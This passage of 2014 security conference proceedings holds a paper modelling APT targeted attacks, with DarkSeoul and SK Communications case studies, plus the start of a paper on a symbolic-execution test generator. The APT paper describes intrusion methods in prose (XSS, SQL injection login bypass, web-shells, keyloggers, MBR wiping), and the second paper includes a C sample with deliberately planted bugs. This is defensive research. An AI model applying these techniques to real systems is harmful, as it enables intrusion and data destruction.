C. Miller, “Mobile attacks and defense,” Security & Privacy, IEEE,
vol. 9, no. 4, 2011, pp. 68–70.
“Kaspersky:
forget
lone
hackers,
mobile
malware
is
serious
business,”
Feb.
2014,
URL:
http://www.theguardian.com/technology/2014/feb/26/kasperskyandroid-malware-banking-trojans [accessed: 2014-09-05].
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[5] “Android Permissions,” URL: http://developer.android.com/reference/an
droid/Manifest.permission.html [accessed: 2014-09-05].
[6] T. Blasing, L. Batyuk, A. D. Schmidt, S. A. Camtepe, and S. Albayrak,
“An android application sandbox system for suspicious software detection,” in Proceedings of the 5th international conference on Malicious
and unwanted software (MALWARE). IEEE, 2010, pp. 55–62.
[7] D. J. Wu, C. H. Mao, T. E. Wei, H. M. Lee, and K. P. Wu, “Droidmat:
Android malware detection through manifest and api calls tracing,”
in Proceedings of the Seventh Asia Joint Conference on Information
Security (Asia JCIS). IEEE, 2012, pp. 62–69.
[8] A. Reina, A. Fattori, and L. Cavallaro, “A system call-centric analysis
and stimulation technique to automatically reconstruct android malware
behaviors,” EuroSec, Apr. 2013.
[9] I. Burguera, U. Zurutuza, and S. Nadjm-Tehrani, “Crowdroid: behaviorbased malware detection system for android,” in Proceedings of the 1st
ACM workshop on Security and privacy in smartphones and mobile
devices. ACM, 2011, pp. 15–26.
[10] Y. Zhou, Z. Wang, W. Zhou, and X. Jiang, “Hey, you, get off of my
market: Detecting malicious apps in official and alternative android
markets.” in NDSS, 2012.
[11] M. Spreitzenbarth, F. Freiling, F. Echtler, T. Schreck, and J. Hoffmann,
“Mobile-sandbox: having a deeper look into android applications,”
in Proceedings of the 28th Annual ACM Symposium on Applied
Computing. ACM, 2013, pp. 1808–1815.
[12] M. Alazab, V. Monsamy, L. Batten, P. Lantz, and R. Tian, “Analysis of
malicious and benign android applications,” in Proceedings of the 32nd
International Conference on Distributed Computing Systems Workshops
(ICDCSW). IEEE, 2012, pp. 608–616.
[13] W. Enck, P. Gilbert, B. G. Chun, L. P. Cox, J. Jung, P. McDaniel,
and A. N. Sheth, “Taintdroid: an information flow tracking system for
real-time privacy monitoring on smartphones,” Communications of the
ACM, vol. 57, no. 3, 2014, pp. 99–106.
[14] S. Jain and Y. K. Meena, “Byte level n–gram analysis for malware
detection,” in Computer Networks and Intelligent Computing. Springer,
2011, pp. 51–59.
[15] D. K. S. Reddy and A. K. Pujari, “N-gram analysis for computer virus
detection,” Journal in Computer Virology, vol. 2, no. 3, 2006, pp. 231–
239.
[16] “Android version history,” URL: http://en.wikipedia.org/wiki/Android v
ersion history [accessed: 2014-09-05].
[17] S. Brahler, “Analysis of the android architecture,” Karlsruhe institute
for technology, 2010.
[18] “The
Android
Asset
Packaging
Tool,”
URL:
http://developer.android.com/tools/building/index.html
[accessed:
2014-09-05].
[19] “Android APKTool: A tool for reverse engineering Android apk files,”
URL: https://code.google.com/p/android-apktool/ [accessed: 2014-0905].
[20] “Apk2java: Batch file to automate apk decompilation process,” URL:
http://code.google.com/p/apk2java/ [accessed: 2014-09-05].
[21] “Android
Broadcast
Receiver,”
URL:
http://developer.android.com/reference/android/content/BroadcastReceiv
er.html [accessed: 2014-09-05].
[22] “DroidBox:
Android
Application
Sandbox,”
URL:
https://code.google.com/p/droidbox/ [accessed: 2014-09-05].
[23] “MonkeyRunner,”
URL:
http://developer.android.com/tools/
help/monkeyrunner concepts.html [accessed: 2014-09-05].
[24] A. Lineberry, D. L. Richardson, and T. Wyatt, “These aren’t the
Permissions you’re Looking for,” in DEFCON 18, Las Vegas, NV, 2010.
[25] Y. Zhou and X. Jiang, “Dissecting android malware: Characterization
and evolution,” in Proceedings of the 2012 IEEE Symposium on
Security and Privacy (SP). IEEE, 2012, pp. 95–109.
[26] “VirusTotal,” URL: https://www.virustotal.com/ [accessed: 2014-0905].
[27] “WEKA,” URL: http://www.cs.waikato.ac.nz/ml/weka/ [accessed:
2014-09-05].
[28] I. H. Witten and E. Frank, Data Mining: Practical machine learning
tools and techniques. Morgan Kaufmann, 2005.
131
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Involvers’ Behavior-based Modeling in Cyber Targeted Attack
Youngsoo Kim and Ikkyun Kim
Cyber Security Research Laboratory
Electronics & Telecommunications Research Institute
Daejeon, Korea
e-mail: {blitzkrieg, ikkim21}@etri.re.kr
Abstract— Cyber targeted attack has sophisticated techniques
using malwares to exploit vulnerabilities in systems and an
external command and control is continuously monitoring and
extracting data off a specific target. Since this attacking
process is working continuously and uses diverse malicious
codes and attacking routes, it is considered to be difficult to
detect in advance. In this paper, we categorized cyber targeted
attacks into four steps and defined potential behaviors of
involvers like attackers or victims, in order to make a model.
Each behavior of our model can include a couple of methods.
Furthermore, we applied our behavior-based model to the real
targeted attacks, “3.20 South Korean Malware Attack” and
“The Targeted Attack for SK Communications”.
Keywords-APT; Targeted Attacks; Behavior-based Modeling;
Malicious Codes; 3.20 DarkSeoul.
I.
INTRODUCTION
Cyber targeted attack, which is also known as Advanced
Persistent Threat (APT), is a kind of intelligent attacking
method having a goal of acquiring classified information or
control of critical infrastructure, by penetrating networks of
targets in a stealthy way and staying there in the long term. It
usually targets organizations or nations for business or
political motives. It has complicated techniques using
malicious codes to take advantage of vulnerabilities in
systems and an outer command and control is constantly
observing and deriving data from a specific target [1]. This
attacking method is working continuously and utilizes
various malwares and attacking routes, so it is deemed to be
hard to discover beforehand. In Section 2, we classified
advanced persistent threat and described possible behaviors
of involvers like attackers or victims for modeling. Each
behavior of our model can include several methods. In
Section 3, we introduced a couple of real targeted attacks and
indicated that our behavior-based model is fit to depict them
and described some useful cases of proposed modeling map,
and conclude with some remarks and further works in
Section 4.
II.
EACH STEP OF BEHAVIORS/METHODS FOR
CYBER TARGETED ATTACKS
Cyber targeted attacks can be divided into 4 phases: The
preparation phase, the penetration phase, the control phase,
and the achievement phase. Figure 1 depicts the detailed
behaviors of attackers and victims.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
In the preparation phase, attackers collect and analyze
diverse data of targeting web sites, and they hack servers
with vulnerabilities and make them Command and Control
(C&C) servers. Also, they use various ways for triggering
download of malicious codes. In the penetration phase,
attackers try to acquire user authority using diverse methods
and user’s Personal Computers (PCs) can be infected with
malicious codes by running malicious attached files,
updating falsified software, or using unauthorized USBs. In
the control phase, attackers try to acquire additional user
authorities and collect additional information using various
ways. They can also control victimized systems with
backdoors or web-shells and spread malicious codes to all
connected devices. In the achievement phase, attackers can
acquire critical information using remote commands or webmails and they can also emasculate systems using automatic
termination or remote starting.
A. The Preparation Phase
If attackers decide attacking targets, they visit targeting
web pages for looking into vulnerabilities [2]. They could
acquire user information by falsifying URLs of targets. First,
they register the targeting website and try to read web-board
messages requiring the higher-level accessing authority.
Even though they are rejected to access, they can watch an
URL of web-board message which they want to read using
right-hand mouse-clicking. And then, they try to falsify that
URL to acquire user information without reading authority.
They can collect and analyze information related to
targeting victims using web-crawlers or bots, which look
around enormous web pages, including web sites providing
Social Network Service (SNS), such as Facebook, Twitter,
etc., to get information. They can also use meta-search
engines connecting diverse searching engines for same
reason.
Attackers hack servers (e.g., web-board, web-mail server,
and web-disk) with vulnerabilities and make them C&C
servers. After they acquire authorities of accessing the
targeting servers using malicious codes, they falsify them to
play a role of the C&C servers.
After that, attackers prepare for inducing the victims to
download malicious codes in diverse ways. They could send
e-mails including attached malicious codes to targeting users
or attach them to web-board messages for triggering
downloads. Also, they could falsify software of updating
servers in case of installing. If they can do it, users download
them and install falsified updating software unconsciously.
They could use Cross Site Script (XSS) vulnerabilities in two
132
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 1. Each Step Behaviors/Methods for Cyber Targeted Attacks
ways, i.e., Stored XSS and Reflected XSS. Attackers can
insert malicious scripts to web-board messages using XSSvulnerability of the targets for triggering infection of
malicious scripts. After they find that XSS vulnerability, they
write web-board messages with malicious scripts and post
those messages on the web-board [3]. They could also send
e-mails including URL links of targeting web sites having
malicious scripts to users for infection. After they find the
XSS vulnerability of targeting web sites, they write e-mail
messages including URL links having malicious scripts and
send them to the targeting users in order to be infected by
clicking those URL links. Sometimes, they prepare USB
sticks including malicious codes and putting them on
somewhere in the targeted area [4]. Also, attackers could
replace attached files of unwritten web-mails with malicious
files using ID/password of web-mail collected in advance.
After they collect many pairs of ID/password, they check
unwritten web-mails using collected ID/passwords and
replace attached files with malicious files.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
B. The Penetration Phase
After preparing, attackers try to acquire user authority
using diverse methods, such as URL falsification, weak
passwords, command injection, or SQL injection. They
acquire user authority by falsifying the URL of targeting web
site. First, they check a pattern of URL attributes of the
targets and repeatedly access to those web sites by typing
randomly changed URL links. They could login and acquire
user authorities if randomized user-codes are matched.
Sometimes, attackers acquire weak passwords using
password cracking tools. Additionally, they run local system
commands remotely because of the vulnerability of
insufficient authorizing input variables [5]. First, they check
the address of targeting web site. After injecting a system
command to this address, they could access with this
changes address. And then, they could see and get some
system information. Finally, attackers could watch, falsify,
or delete database data by fabricating input data of database
application [6]. It occurs since database applications do not
check the validity of input data from users. They could
133
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
bypass certificating process for users or administrators using
SQL injection. After checking if they could input special
characters to log-in windows, they input SQL commands to
log-in windows and then, they become able to log-in without
a certificating process.
User PCs can be infected with malicious codes in various
methods. A user runs attached files of received e-mails
including malicious codes and he becomes infected. When a
user receives an e-mail attaching malicious files, he reads the
message of that e-mail. And then, if he activates malicious
attached files, he will become infected. If a user runs
malicious files attached in web-board messages and he
becomes infected. When a user clicks a message of web-hard,
web-server, or web-board having attached malicious files, he
runs attached malicious files. As a result, he becomes
infected. Furthermore, a user could be infected through
automatic activating of updating software falsified in
advance. First, updating software having been falsified in
advance are executed automatically. If a user activates the
updating process or automatic updates are activated, the
user’s PC is infected. A user could be infected by reading a
web-board message including malicious scripts. After
accessing the web, a user read a web-board message having
malicious scripts. And then, contents of the web-board
message including malicious scripts are sent to the user.
Finally, the user’s PC is infected and the user’s cookies are
sent to the attacker. Sometimes, if a user receives an e-mail
with a malicious URL link and accesses to that URL link, he
could be infected by malicious scripts. First, he receives an
e-mail including a malicious URL link and clicks that link.
As a result, he can access a link having a malicious script,
and the user PC is infected since the malicious script is
activated. Finally, the user’s cookies are sent to the attacker.
Local systems could be infected by bringing and executing
infected unauthorized USB sticks. If a user brings infected
unauthorized USB sticks and he put them on local systems
like PCs or servers, local systems are infected. A user could
also be infected by running a falsified attached file of a webmail. If a user logs in his web-mail account and checks an
attached file of web-mail falsified by an attacker in advance,
his PC is infected by executing the attached file.
C. The Control Phase
To achieve final goals, attackers try to acquire additional
user authorities using weakness of shared folders or keyloggers and collect additional information using various
ways such as port scanning, weak points of Network Access
Control (NAC), vulnerabilities of applications, etc.
Furthermore, they can control victimized systems by
installing backdoors or uploading web-shells and spread
malicious codes to all connected devices by falsifying
updating servers or web servers of targets.
Attackers could access the shared PC if a pair of
ID/password of the infected PC is same as that of the shared
PC. After that, they could access the agent server at a time, if
they install a scheduler like at.exe at the shared PC. If they
log in with a pair of ID/password of infected PC, they try to
access to the shared PC using the same pair. In case that the
pair is the same, they could access. If they install a scheduler
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
at the shared PC, they could access the agent server at a time.
Additionally, all keyboard-typing logs on infected PCs could
be recorded in real-time using key-loggers. First, attackers
install a key-logging program on infected PCs. If users make
use of the infected PCs, the key-logging program records all
keyboard-typing logs in real-time. After receiving recorded
logging data, attackers check and get some pairs of
ID/password.
Attackers can get additional information by analyzing
vulnerabilities of various web applications such as SQL
injection, file upload, XSS, path traversal, cookies, parameter
manipulation, configuration setting errors, admin page,
backup/temporal files, etc. Attackers can also collect
additional information by finding unencrypted folders or
files in infected PCs. After logging in the infected PCs, they
search all folders or files. If they find unencrypted ones, they
can get additional information. Sometimes, attackers can find
vulnerabilities of NAC by checking security policies or
security solutions, and then, can access to the local network
without authority checks. They find vulnerabilities of NAC
by checking security policies or security solutions in order to
access to the targeting local network. And then, they can
access servers and check data to get information. Attackers
can access the infected PCs and scan all ports to check
whether they are open or not. They access the infected PCs
and check opened ports using nmap command or portscanning tools to get information. They can also check the
status of local network, for example some PCs are grouping
or some devices are powered off, by scanning such as
nbtscan, nbtstat, etc. Additionally, attackers harvest target
information related to the final goals. They access to the
admin computer dealing with local information and find and
harvest the target information.
Attackers can hide backdoor files in advance, and they
get root authority by activating them to control the target
system [7]. First, they access the infected PCs and make
backdoor files. Backdoor files are compiled at temp directory.
And then, they run backdoor files in a general account, they
get root authority and become to be able to control the target
system. Attackers can also control the targeting system by
installing terminal programs for remote control and database
accessing tools, after finding PCs operating 24 hours a day.
First, they find PCs operating 24 hours a day, and they install
database related tools and terminal programs for remote
control. And then, they check database and logs on the
mainframe computer. As a result, they become to control the
targeting system and gets information. Sometimes, attackers
acquire critical information and control the targeting system
by monitoring the infected PCs with Virtual Network
Computing (VNC). After accessing the infected PCs, they
install a VNC program. If administrators or developers use
the infected PCs, attackers can watch what they do with
VNC. As a result, they can control the targeting system and
acquire critical information. Attackers can acquire control of
the target system by uploading a web-shell, a web script file
(e.g., asp, jsp, php, and sci) usually made maliciously in
order to run instructions on the targeting web server remotely
[8]. First, they make a web script file and upload it on local
web-board. After searching a URL enabling them to move
134
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 2. Mapping result of the 3.20 cyber-attack through behavior-based modeling map
into the uploading location using file attributes, they access
the shell by entering this URL. And then, they get some
system information by using some commands. Additionally,
attackers connect the infected PCs with themselves or C&Cs
for sending instructions or additional malicious codes to the
infected PCs or receiving the targeting system information
from them. After getting control of system, they send
instructions or additional malicious codes to the infected PCs
or receive the targeting system information by way of C&Cs.
Attackers can spread malicious codes using the updating
server including falsified updating software. All PCs
activating automatic updates can be infected. They can also
trigger infection of malicious codes through adding falsified
web pages or banners enabling users to access and click on
them. They add web pages or banners including malicious
codes to the target web server. And then, if users visit the
targeting web site, their PCs are infected.
D. The Achievement Phase
In this phase, attackers can acquire critical information
by copying files with remote commands or using web-mails
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
or encrypted packets. Also, they can emasculate systems by
destructing Master Boot Record (MBR)/Volume Boot
Record (VBR), for example, or quit systems using automatic
termination or remote starting.
Attacker can control infected PCs and take away critical
files from them using a remote command like scp or webmails. They can also encrypt packets of critical data using
packet-extracting commands/tools and take them. Attackers
run destruction commands for MBR/VBR of infected PCs
and preclude system booting. Additionally, they can catch
the following decisive opportunities by monitoring and
analyzing infected PCs. Sometimes, attackers terminate the
targeting system using commands for automatic termination
of specific software or hardware or quit the targeting system
using commands for remote starting.
III.
MODELLING FOR REAL CASES
We applied our behavior-based model to two real
targeted attacks. One was occurred in July of 2011 and the
other was occurred in March 20, 2013.
135
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 3. Mapping result of the Targeted Attack for SK Communications through behavior-based modeling map
3.
A. Modelling for 3.20 South Korean Malware Attack
The attack, dubbed DarkSeoul, against South Korean
media and banking organizations severely disrupted a
handful of organizations with a coordinated distribution of
“wiper” malware designed to destroy data on hard drives and
render them unbootable [9]. It is known that the malware
will overwrite MBR and VBR. The records and files
overwritten by the malware so far have been wiped with
patterns of 'HASTATI' or 'PR!NCPES’. We referenced some
analysis reports and described detailed processes of this
attack as follows [10]. We mapped 8 steps of this attack to
potential behaviors we categorized. Figure 2 depicts the
mapping result of the 3.20 cyber-attack.
1.
2.
An attacker secures C&Cs using vulnerabilities of
web-boards or web-mails.
The attacker falsifies the (C&C #1 and C&C #2)
web-server and uploads malicious code #1.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
4.
5.
6.
7.
8.
A user (User #1) accesses falsified web-server and
is infected with malicious code #1.
User #1 sends his file-list to C&C #1 and receives
and runs malicious code #2.
User #1 is infected with malicious code #2 and
performs port-scanning.
User #1 sends results of port-scanning and
downloads/performs malicious code #3 and #4.
With malicious code #3 and #4, user #1 acquires an
authority of Patch Management System (PMS)
server and uploads a malicious code for systemdestruction.
Other users update vaccine programs and their
hard-disks are broke down.
B. Modeling for Targeted Attack for SK Communications
Between 18 and 25 July 2011, attackers infected over 60
SK Communications computers and used them to gain
access to the user databases. They infected these computers
by first compromising a server belonging to a South Korean
136
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
software company, used to deliver software updates to
customers (including SK Communications). Attackers
modified the server so that the SK Communications
computers would receive a trojaned update file when they
conducted their routine checks for software updates [11]. We
mapped 5 steps of this attack to potential behaviors we
categorized. Figure 3 depicts the mapping result of the 3.20
cyber-attack.
1.
2.
3.
4.
5.
An attacker hacks Alzip update server and uploads
a malicious code through accessing backdoors [12].
A user updates Alzip program and downloads a
malicious code from the redirecting server
unconsciously.
The key-logger is installed in that user’s computer
and user’s password can be logged when he uses it
for accessing database.
The attacker requests and receives key-logging
information.
The attacker orders to dump and send database and
gets it from the key-loggers of user’s PC.
This proposed involver’s behavior-based model of cyber
targeted attack could be useful for the following cases.
First, attacking methods are very diverse, so our model
can be a basic scale for deciding whether the attack is cyber
targeted attack or not. Second, generally cyber targeted
attack can occur over a long period of time. If some
behaviors related to cyber targeted attack can be found in its
middle stages, the following potential behaviors can be
prevented in advance, referencing to our model. Third, if
some attacking behaviors are found in its middle stages or
final stages, we can guess what happened in the beginning
stages using our model. Fourth, since our model includes
analysis points at each phase, it can be a guidance map for
analyzing causes of hacking accidents. If cause analysis can
be achieved rapidly, services delayed due to this hacking
accident could be restored faster. Finally, according to 44
methods of our model, detailed analyses of devices relating
to involvers can be done.
IV.
For testing, we are building the cyber hacking test-bed
including routers, switches, servers, PCs, and notebooks. We
have plans to make some APT-scenarios similar to real
targeted attack like DarkSeoul, and implement them on the
cyber hacking test-bed to verify our model.
REFERENCES
[1]
[2]
[3]
[4]
[5]
[6]
[7]
[8]
[9]
CONCLUSION AND FUTURE WORK
We categorized cyber targeted attacks into 4 steps and
defined potential behaviors of involvers like attackers or
victims, in order to make a model. Each behavior of our
model can include a couple of methods. Furthermore, we
applied our behavior-based model to the real targeted attacks,
“3.20 South Korean Malware Attack” and “The Targeted
Attack for SK Communications” and described use cases.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[10]
[11]
N. Virvilis and D. Gritzalis, “The big four-what we did wrong
in protecting critical ICT infrastructures from Advanced
Persistent Threat detection?,” The Eighth International
Conference on Availability, Reliability & Security (ARES
2013), IEEE
Press, Sep. 2013, pp. 248-254,
doi:10.1109/ARES.2013.32.
W. Gary and S. Zhendong, “Sound and precise analysis of
web applications for injection vulnerabilities,” Conference on
Programming Language Design and Implementation (PLDI
2007), ACM, Jun. 2007, pp. 32-41, ISBN: 978-1-59593-633-2.
M. Michael and L. Monica, “Automatic generation of XSS
and SQL injection attacks with goal-directed model
checking,” Proc. of the Conference on Security Symposium
(SS 2008), USENIX Association Berkeley, Jul. 2008, pp. 3143.
C. Harlan and A. Cory, “Tracking USB storage: Analysis of
windows artifacts generated by USB storage devices,” Digital
Investigation,
vol. 2, Jun. 2005, pp. 94-100,
doi:10.1016/j.diin.2005.04.006.
S. Zhendong and W. Gary, “The essence of command
injection attacks in web applications,” Conference record of
the 33rd ACM SIGPLAN-SIGACT Symposium on Principles
of Programming Language (POPL 2006), ACM, Jan. 2006, pp.
372-382, ISBN: 1-59593-027-2.
W. Halfond, J. Viegas, and A. Orso, “A classification of SQLinjection attacks and countermeasures,” Proc. of the IEEE
International Symposium on Secure Software Engineering,
IEEE, Mar. 2006, pp. 13-15.
S. Gaspers and S. Stefan, “Backdoors to Satisfaction,” The
Multivariate Algorithmic Revolution and Beyond, Springer
Berlin Heidelberg, pp. 287-317, Nov. 2012, ISBN: 978-3642-30890-1.
A. Straniery and Z. John, “WebShell: The development of
web based expert systems,” Research and Development in
Intelligent Systems XVIII. Springer London, Dec. 2001, pp.
245-258, ISBN: 978-1-85233-535-9.
US-CERT, “South Korean Malware Attack”, 2013.
https://www.us-cert.gov/sites/default/files/publications
[Retrived: Oct, 2014].
IssueMakersLab, “Operation 1Mission aka 3.20 DarkSeoul,”
http://www.issuemakerslab.com [Retrived: Oct, 2014].
L. Moon-young, “Personal Information Hack Traced to
Chinese IP address,” The Hankyoreh Media Company, 2011.
http://english.hani.co.kr/arti/english_edition/e_national/491514.
html [Retrived: Oct, 2014]
[12] Altools, http://www.altools.com [Retrived: Oct, 2014]
137
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Test Case Generation Assisted by Control Dependence Analysis
Puhan Zhang
China Information
Technology Security
Evaluation Center
Beijing, China
zhangph2008@gmail.com
Qi Wang
Renmin University of China
Beijing, China
China Telecom Corporation
Beijing Company
Beijing, China
wangq@163.com
Abstract—The paper proposes and develops a new test case
generation tool named Symbolic Execution & Taint Analysis
(SYTA) that can capture implicit information flows by control
dependence analysis. When running, SYTA traces execution
paths to track constraints on symbolic variables. Some
equivalence relationship asserts will be constructed to store
the equivalence information among variables for control
dependence analysis. If a security sink is reached, SYTA
builds a constraint, path conditions and equivalence
relationship asserts, which are to be sent to a constraints
solver. The test cases will be generated from possible
counterexamples in constraint solving. Compared with
traditional static analysis tools, SYTA can track implicit
information flows, and generate test cases by control
dependences analysis effectively.
Keywords-test case generation; control dependence; implicit
information flow; symbolic execution
I.
INTRODUCTION
Nowadays, test case generation has become the most
important step of code testing, which is usually realized by
the symbolic execution approach. If there exists a bug, the
test cases can help programmers to find the spot that causes
the error.
A traditional Fuzzing approach is a form of blackbox
testing which randomly mutates well-formed inputs and use
these variants as test cases [1][2]. Although Fuzzing can be
remarkably effective, the limitations of Fuzzing are that it
usually provides low code coverage and cannot drive deeper
into programs because blind modification destroys the
structure of inputs [3]. In a security context, these limitations
mean that potentially serious security bugs, such as buffer
overflows, are possibly missed because the code containing
the bugs is even not exercised.
Combining general static analysis with taint analysis to
test applications and draw test cases is presently the hottest
research technique, such as TaintScope [6]. Taint analysis
allows a user to define the taint source and propagate the
taint following specific propagation policy during execution,
and finally, trigger a particular operation if the
predetermined security sink is hit.
Unfortunately, this smart Fuzzing technique bears many
pitfalls [4], among which missing the implicit information
flows is the most critical one. Contrary to explicit
information flows caused by direct assignment, implicit
information flows are a kind of information flow consisting
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Guowei Dong
China Information
Technology Security
Evaluation Center
Beijing, China
dgw2008@163.com
Bin Liang, Wenchang Shi
School of Information
Renmin University of China
Beijing, China
{liangb,
wenchang}@ruc.edu.cn
of information leakage through control dependence. The
example shown in Figure 1 discloses the nature of implicit
information flows. There is no direct assignment between
variables h and l in the sample program, but l can be set to
the value of h after the if-then-else block by control
dependence. Even though the early attention and definition
of the implicit flow problem dated back to 1970’s [5], no
effective solution has been found. Some newly-developed
tools, such as TaintScope [6], detour implicit information
flows and limit their analysis only to explicit information
flows, which incur the following three problems:
Missing implicit information flows may lead to a
under-tainting problem and false negative. As a
result, the security vulnerabilities caused by control
dependence will not be detected. Especially, it is
critical to capture implicit flows in privacy leak
analysis.
Control dependence is also a common programming
form in benign programs. For example, some
routines may use a switch structure to convert
internal codes to Unicode in a Windows program
such as the following code segment. switch(x){ case
a: y = a; break; case b: y = b; break; ……}. It
indicates that it is necessary to analyze the implicit
information flows for common software testing.
To counter the Anti-Taint-Analysis technique,
implicit information flows must be analyzed
effectively [7]. Malware can employ control
dependence to propagate sensitive information so as
to bypass traditional taint analysis.
To address these limitations and generate test cases with
tainting techniques, we propose and develop a new tool
called Symbolic Execution & Taint Analysis (SYTA), which
can generate test cases by considering implicit information
flows. Compared with traditional static analysis tools, SYTA
can track implicit information flows and generate test cases
1:h := h mod 2;
2:if h = 1 then
3:
l := 1;
4:else
5:l := 0;
6:end if
Figure 1. A sample program of implicit information flow
138
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
by control dependences analysis effectively. Though it is
hard to say what percentage of a program can be classified
as implicit information flow, it may reveal some
vulnerabilities that explicit information flow is unable to.
The rest of the paper is organized as follows. Section 2
briefly analyzes the target problem. Section 3 discusses our
methodology and design of SYTA. Section 4 evaluates our
approach. Section 5 summarizes related work. Finally,
Section 6 concludes the paper and discusses future-work
directions.
II.
PROBLEM ANALYSIS
This section describes the problem we encounter by
walking the readers through the testing of a sample program
shown in Figure 3 (a). Despite its small size, it illustrates the
most common characteristics of implicit information flows.
There exist three bugs related to control dependence in the
sample program.
1) Array bound overflow in line 29. The program
implies that variable k will be equal to variable i under a
specific condition. If 2 is assigned to i by users, k will be set
to 2 through four control branches, including three ‘if’ and
one loop statements. In line 28, the value to which pointer p
points is 4. Eventually, an array bound overflow will be
triggered when dereferencing p as the index of array a in
line 29.
2) Divide-by-zero in line 30. If 3 is assigned to variable
i by users, through several control branches, *p will be set
to 0 in line 28, then the divisor t becomes 0 in line 30.
3) Denial of service in line 31. If 1 is assigned to
variable i, the result of a DoS attack may occur in the
program in line 31.
In traditional analysis tools, the test cases cannot be
generated for above bugs due to the absence of control
dependence analysis. Take EXE [8] and KLEE [9] as
examples, they are totally based on explicit information
flows analysis. When being applied to the sample program,
though variable i is symbolically executed and analyzed,
those tools can not produce effective test cases, because
there are not any direct assignment relationships among i
and some other variables, such as k, t, and p etc.
Our solution is to take implicit information flows into
consideration, in which the flow of taint is propagated from
variable i to variables j, tmp and k (in line 18, 25 and 30,
respectively, in the source code). Variable p in line 33 is
tainted because of the data flow and it is possible to identify
the bugs and automatically obtain the test case to hit them.
III.
METHODOLOGY
SYTA, as a test case generator, actually functions as a
combination of an intermediate language interpreter, a
symbolic execution engine and a taint analyzer. During each
symbolic execution, some lists are built to store information
for taint propagation. Test programs are firstly parsed by a
compiler front-end and converted to an intermediate
language. The corresponding Control Flow Graphs (CFGs)
are constructed as the inputs of SYTA. SYTA will traverse
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
User
Taint
source
Source
code
GCC
CFG
SYTA
Test
cases
STP
Note: STP is an SMT solver.
Figure 2. The architecture of SYTA
each CFG and run symbolic execution. It will perform two
kinds of taint propagations during symbolic execution,
collect symbolic path conditions, record the equivalence
information among variables and generate Satisfiability
Modulo Theories (SMT) constraints eventually. An SMT
solver will be employed to solve and check these constrains
to detect potential bugs. If some bugs are found, test cases
will be generated and reported.
A. Overview
The core of SYTA is an interpreter loop that selects a
path, composed of basic blocks and directed by edges of
CFG, to symbolically execute each statement of the basic
blocks and perform two kinds of taint propagations (explicit
and implicit). The loop continues until no basic blocks
remain, and generates test cases if some bugs are hit. The
architecture is illustrated in the Figure 2.
For two kinds of taint analysis, we maintain the Explicit
Information Flow Taint (EFT) lists and Implicit Information
Flow Taint (IFT) lists. Besides, an Equivalence
Relationships (ER) list is maintained to record equivalence
information among variables in condition statements for
control dependence analysis.
At the very beginning of testing, users appoint some
interested variables as the taint sources which are recorded
into the EFT and IFT lists in proper forms. The two lists
involve different taint propagation policies that we design
for explicit and implicit information flows respectively.
When a security sink is encountered, SYTA will invoke
an SMT solver to carry out a query considering the
operation related to current security sink. Current path
conditions and expressions drawn from the ER list will act
as the context of the query, namely, asserts of solving. By
running the query, SYTA checks if any input value exists
that may cause a bug. If a bug is detected, the SMT solver
will produce a counterexample as a test case to trigger the
bug.
B. Implicit Information Flow Taint Propagation
The intuition of taint propagation over implicit
information flows can be illustrated using a sample program
shown in Figure 4.
In this sample program, a conditional branch statement
br, namely if (i >= 4) in line 5, decides which statements st
should be executed ( j = 5 in line 6 or j = 0 in line 9). The
139
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
value of i affect the value of j. Therefore, based on control
dependence, the taint state should be propagated from the
source operand of br, namely the variable i, to st’s
destination operands, the variable j. To achieve this result,
SYTA needs to compute and record post dominance
relationships at the basic-block level before symbolic
execution.
At first, a user appoints variables as taint sources and
SYTA calculates the immediate post-dominant basic block
of the corresponding basic block containing the taint
sources. Insert the pair <i, ipdom_bb> into the IFT list,
where i stands for the tainted variable, and ipdom_bb means
the immediate post-dominate basic block of the current
basic block.
During path travelling, when a basic block is reached,
SYTA compares it with all the ipdom_bbs in the controlflow based taint pairs in the IFT list in an attempt to find
matches and then remove the matching pairs. After
removing, if the IFT list is not empty, the ipdom of the
current basic block will be calculated and the taint pairs are
formed together with every variable v referenced in the
current basic block. These pairs are added to the IFT list
one by one. In other words, if the target variable i is marked
as tainted, the variables in the current basic block will also
be marked as tainted according to the control dependence
relationship. No further operations will be performed if the
1: void main(void) {
2:
unsigned int i;
3:
unsigned int t;
4:
int a[4] = { 1, 3, 5, 1 };
5:
int *p;
6:
int tmp;
7:
int j;
8:
int k;
9:
int x = 100;
10:
scanf("%d",&i);
11:
if(i >= 4){
12:
j = 5;
13:
}
14:
else{
15:
j = 0;
16:
}
17:
for(j; j<4;j++)
18:
{
19:
tmp = 1;
20:
if( j != i){
21:
tmp = 0;
22:
}
23:
if (tmp == 1){
24:
k = j;
25:
}
26:
}
27:
p = a+k;
28:
*p = *p - 1;
29:
t = a[*p]-1;
30:
t = x / t;
31
sleep (t*10000);
32: }
IFT list is NULL and only the explicit information flow
taint propagation goes on.
In a CFG, basic block m post-dominates (ipdom) n
means all directed paths from m to the exit basic block
contain n. If there is no node o such that n pdom o and o
pdom m, we call m is immediate post-dominates n. Just like
that in Figure 4, BB5ipdom BB2.
Take the program in Figure 4 (a) as an example again,
whose CFG and post-dominance tree are shown in Figure 4
(b) and (c), respectively. We assume that variable i is chosen
as a taint source. At first, the IFT list is initialized to be
empty. When line 5 is executed, SYTA will identify the
current statement as a condition statement. The
corresponding ipdom is BB5, a pair <i, BB5> will be added
into the IFT list. The symbolic execution forks here and
